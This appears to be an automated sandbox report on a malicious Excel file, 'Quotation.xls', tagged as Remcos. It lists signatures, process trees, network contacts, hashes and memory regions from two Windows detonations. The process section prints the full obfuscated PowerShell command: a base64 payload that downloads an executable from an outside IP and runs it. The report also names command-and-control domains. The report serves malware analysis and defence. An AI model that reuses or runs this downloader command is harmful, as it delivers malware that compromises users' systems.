Analysis Overview
SHA256
c0484101a8ad9d96190d39f100d6a6ed337873df68eb587c74a91b5cdd19cdd5
Threat Level: Known bad
The file Quotation.xls was found to be: Known bad.
Malicious Activity Summary
Remcos
Process spawned unexpected child process
Evasion via Device Credential Deployment
Blocklisted process makes network request
Downloads MZ/PE file
Executes dropped EXE
Loads dropped DLL
Drops file in System32 directory
Suspicious use of SetThreadContext
Detected phishing page
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Modifies Internet Explorer settings
Suspicious behavior: AddClipboardFormatListener
Uses Volume Shadow Copy service COM API
Uses Task Scheduler COM API
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Uses Volume Shadow Copy WMI provider
Checks processor information in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-24 10:30
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-24 10:30
Reported
2024-07-24 10:33
Platform
win7-20240704-en
Max time kernel
148s
Max time network
155s
Command Line
Signatures
Remcos
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\winiti.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1108 set thread context of 2884 | N/A | C:\Users\Admin\AppData\Roaming\winiti.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe |
Detected phishing page
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Quotation.xls
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" "/c PowerShEll -EX BYPASs -NOP -w 1 -C DEViCECrEDEntIaldEPLOyment ; IeX($(iex('[sysTem.TeXt.ENCOdIng]'+[chAR]58+[ChAr]0x3a+'Utf8.gETStRIng([sysTEM.COnveRT]'+[cHAr]58+[CHar]0x3A+'frOMbaSe64StRing('+[char]0x22+'JDVYWE5WZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iRVJERUZpbml0SU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdLbU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFljSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1FpSEtBVCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtGWmN1cW5tYWNILEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYU3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1Fc3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeVVjSHZ3QnF1TWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNVhYTlZlOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDIzMDdXL2NzcnNzLmV4ZSIsIiRFTlY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1NUYXJULVNMZUVwKDMpO3NUQXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcd2luaXRpLmV4ZSI='+[chAR]0x22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PowerShEll -EX BYPASs -NOP -w 1 -C DEViCECrEDEntIaldEPLOyment ; IeX($(iex('[sysTem.TeXt.ENCOdIng]'+[chAR]58+[ChAr]0x3a+'Utf8.gETStRIng([sysTEM.COnveRT]'+[cHAr]58+[CHar]0x3A+'frOMbaSe64StRing('+[char]0x22+'JDVYWE5WZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iRVJERUZpbml0SU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdLbU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFljSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1FpSEtBVCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtGWmN1cW5tYWNILEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYU3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1Fc3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeVVjSHZ3QnF1TWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNVhYTlZlOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDIzMDdXL2NzcnNzLmV4ZSIsIiRFTlY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1NUYXJULVNMZUVwKDMpO3NUQXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcd2luaXRpLmV4ZSI='+[chAR]0x22+'))')))"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wrr7nadr.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCF22.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCF12.tmp"
C:\Users\Admin\AppData\Roaming\winiti.exe
"C:\Users\Admin\AppData\Roaming\winiti.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tny.wtf | udp |
| US | 172.67.156.72:80 | tny.wtf | tcp |
| US | 192.3.118.15:80 | 192.3.118.15 | tcp |
| US | 172.67.156.72:80 | tny.wtf | tcp |
| US | 192.3.118.15:80 | 192.3.118.15 | tcp |
| US | 107.173.143.46:80 | 107.173.143.46 | tcp |
| US | 8.8.8.8:53 | bossnacarpet.com | udp |
| US | 173.255.204.62:2556 | bossnacarpet.com | tcp |
| US | 8.8.8.8:53 | vegetachcnc.com | udp |
| US | 107.173.4.18:2556 | vegetachcnc.com | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
Files
memory/1356-0-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/1356-1-0x00000000728CD000-0x00000000728D8000-memory.dmp
memory/2904-3-0x0000000002970000-0x0000000002972000-memory.dmp
memory/1356-4-0x00000000030F0000-0x00000000030F2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NFAY0EOS\gdfc[1].hta
| MD5 | 5c8152c47be9ca7a398a85d2e51b2505 |
| SHA1 | 34eeba07fe8667b81f14be825223b26006d7d042 |
| SHA256 | ec3c6a6050bd2e48b86fa5c770b78963ed6f13f5adbd9e96ce86dd81e27ab3cd |
| SHA512 | 8f4cf39c381f68cb3fe3230823b7a96d2808bae4ec3e44c7a2bd90946264da74736fae170cc0f471049b6e4d5ea9b9518f45a078a191ba401ad7b6d8321bae4a |
\??\c:\Users\Admin\AppData\Local\Temp\wrr7nadr.cmdline
| MD5 | b747cdd0ffea5c8ddf7131e17823747f |
| SHA1 | 41a278eddce8b4771d5b42be18cac33331d2d792 |
| SHA256 | d6caa87edcd6c6751870a20178feeae84a47f104537deb1d22571441a9ae16cf |
| SHA512 | 826600fa32ebd9e6fdff00288c2ab0805dd38dc604b4d8835bf148da66711daa7ab5468f92c4b91b39b65f88d1396d65d9d9fcf70703e0de89ff4029dff807a1 |
\??\c:\Users\Admin\AppData\Local\Temp\wrr7nadr.0.cs
| MD5 | a83dc0e46bbad233951be9e3fdba130c |
| SHA1 | 892cfc6827bb1072ec2e26bbf83457497d6a17cb |
| SHA256 | aa9a30262c1a7f73a50a10094b1c5eef9584cd05d275b2ed57430b3431aef967 |
| SHA512 | e02ef7f32d36925b4064b283c5dfe49b2db6fe0df092be7e3e4b3ba6501b840f4d7d86732f63dc4564514e8aef810edc40b42c982b9fb8356b2e5ab6fe580caa |
\??\c:\Users\Admin\AppData\Local\Temp\CSCCF12.tmp
| MD5 | 03a5865dc15c5d0f43ced1aee7a8d16e |
| SHA1 | 81458a58ad5a09f87c5d7b15e4c02dd7a5166555 |
| SHA256 | be1ac8c1b9aebfbe284e5ecd496a0b3322dddd159517c2d7c34770d179ba269f |
| SHA512 | a74181241d37ac5c91766c1122c89cb9bd2e12c24f977fa90ff57b7e5f5fe1f127f8f7182fdd8eee6a3466232dfcec16a68e152c0ef18c15ca265ff8b3fdb428 |
C:\Users\Admin\AppData\Local\Temp\RESCF22.tmp
| MD5 | 35c7d65fd3c27e01c9579b744902459c |
| SHA1 | 36491adf9dccab029e8da529632e88fe6d9fab55 |
| SHA256 | 7b1d94b818cd392846cff1ce027e9fdc66430ef99ee4dbad38f77ab8472dd957 |
| SHA512 | 28cc5a69bb7fca63d1b3de271716ef54affe377712cffd878ae14ed1184c2b7fb60ed514de134f1f753bf734cfb0e9f2dfd9930b6868b74d69c46edd0cef844a |
C:\Users\Admin\AppData\Local\Temp\wrr7nadr.dll
| MD5 | 930f55e4011c2193939d376948c305ad |
| SHA1 | 06464223e8a3f1074a858d66f5308c9115639691 |
| SHA256 | 077694a40703c99a0abc8f1dd04de38912a09c4e9a8e937f6c07cf1b221ffcec |
| SHA512 | e78f11bf5a8b4a4124769fed5c2f5cfc2b1506412fd9e5f40bb4ef6b1bec7c9522f8cf84a739171b42031e3ec10edfa6ae2b97f8194aa6554ef9de7fdd9056c1 |
C:\Users\Admin\AppData\Local\Temp\wrr7nadr.pdb
| MD5 | d861d056a5c35a467b54b45eec5b3f39 |
| SHA1 | e4e34e26d1800c8b57cffe70c8a3150c29c62162 |
| SHA256 | 5ea37039bff6e70ee7d2db0a8e996bd571b3246d6e4e8da21abb3f641921e4a1 |
| SHA512 | 0fc597035a4ccd1c893c5ca30cc3254e0639acfe60e2159128ce68e5cb4942fc2f9d65fda27072d2739e840999ef47e644437868b120c570a398903d87d3dbe4 |
C:\Users\Admin\AppData\Roaming\winiti.exe
| MD5 | f6bf8ada032d17192526ffebb48aed79 |
| SHA1 | 362cb802e430115288638c9d613f00412f1b2519 |
| SHA256 | 153e11471f85de3df5135b0445014698333ff40a9d6c488d291d6517eb19800d |
| SHA512 | 0a2e5dbcc972d8463a3cd0608bb837e232ed1dd909ea7472ade269abb0ae1d9dfbeecefe505caffabefed02af413ee156aa2917f0ac3547f1431183bfa99639c |
memory/2884-36-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2884-37-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2884-38-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2884-39-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2884-40-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2884-41-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2884-42-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2884-43-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2884-44-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1356-47-0x00000000728CD000-0x00000000728D8000-memory.dmp
memory/2884-48-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2884-49-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2884-51-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2884-50-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2884-52-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2884-53-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2884-54-0x0000000000400000-0x0000000000482000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-24 10:30
Reported
2024-07-24 10:33
Platform
win10v2004-20240709-en
Max time kernel
143s
Max time network
133s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\System32\mshta.exe | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE |
Detected phishing page
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1628 wrote to memory of 3688 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\mshta.exe |
| PID 1628 wrote to memory of 3688 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\mshta.exe |
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Quotation.xls"
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tny.wtf | udp |
| US | 104.21.40.183:80 | tny.wtf | tcp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| FR | 52.109.68.129:443 | roaming.officeapps.live.com | tcp |
| US | 192.3.118.15:80 | 192.3.118.15 | tcp |
| US | 8.8.8.8:53 | 183.40.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.68.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.118.3.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.179.89.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
Files
memory/1628-0-0x00007FFAD2E10000-0x00007FFAD2E20000-memory.dmp
memory/1628-2-0x00007FFAD2E10000-0x00007FFAD2E20000-memory.dmp
memory/1628-3-0x00007FFAD2E10000-0x00007FFAD2E20000-memory.dmp
memory/1628-1-0x00007FFB12E2D000-0x00007FFB12E2E000-memory.dmp
memory/1628-6-0x00007FFB12D90000-0x00007FFB12F85000-memory.dmp
memory/1628-5-0x00007FFAD2E10000-0x00007FFAD2E20000-memory.dmp
memory/1628-8-0x00007FFB12D90000-0x00007FFB12F85000-memory.dmp
memory/1628-7-0x00007FFB12D90000-0x00007FFB12F85000-memory.dmp
memory/1628-9-0x00007FFB12D90000-0x00007FFB12F85000-memory.dmp
memory/1628-4-0x00007FFAD2E10000-0x00007FFAD2E20000-memory.dmp
memory/1628-12-0x00007FFB12D90000-0x00007FFB12F85000-memory.dmp
memory/1628-11-0x00007FFB12D90000-0x00007FFB12F85000-memory.dmp
memory/1628-10-0x00007FFAD0860000-0x00007FFAD0870000-memory.dmp
memory/1628-13-0x00007FFAD0860000-0x00007FFAD0870000-memory.dmp
memory/3688-30-0x00007FFB12D90000-0x00007FFB12F85000-memory.dmp
memory/3688-29-0x00007FFB12D90000-0x00007FFB12F85000-memory.dmp
memory/3688-31-0x00007FFB12D90000-0x00007FFB12F85000-memory.dmp
memory/3688-32-0x00007FFB12D90000-0x00007FFB12F85000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
| MD5 | 0e7ee9deb29b355cd65ec941d250191e |
| SHA1 | e9e0abd1e852a87b62599092ec99ff20e3baf211 |
| SHA256 | af21a14f64edb0dd0499a6b7e7c031d039f61438c78d742479d33f94e040fa81 |
| SHA512 | 9d0fa54e29a5c5db95cd21893420b6923618c949cf7dc6d4547ec718993dc70c84c8209c46dc14b2f55eceb81d8070b92db8229f277d16b457f3d078f91ad187 |
memory/3688-42-0x00007FF76E420000-0x00007FF76E428000-memory.dmp
memory/1628-43-0x00007FFB12D90000-0x00007FFB12F85000-memory.dmp
memory/1628-44-0x00007FFB12E2D000-0x00007FFB12E2E000-memory.dmp
memory/1628-45-0x00007FFB12D90000-0x00007FFB12F85000-memory.dmp
memory/1628-47-0x00007FFB12D90000-0x00007FFB12F85000-memory.dmp
memory/3688-48-0x00007FFB12D90000-0x00007FFB12F85000-memory.dmp
memory/1628-76-0x00007FFAD2E10000-0x00007FFAD2E20000-memory.dmp
memory/1628-77-0x00007FFAD2E10000-0x00007FFAD2E20000-memory.dmp
memory/1628-75-0x00007FFAD2E10000-0x00007FFAD2E20000-memory.dmp
memory/1628-74-0x00007FFAD2E10000-0x00007FFAD2E20000-memory.dmp
memory/1628-78-0x00007FFB12D90000-0x00007FFB12F85000-memory.dmp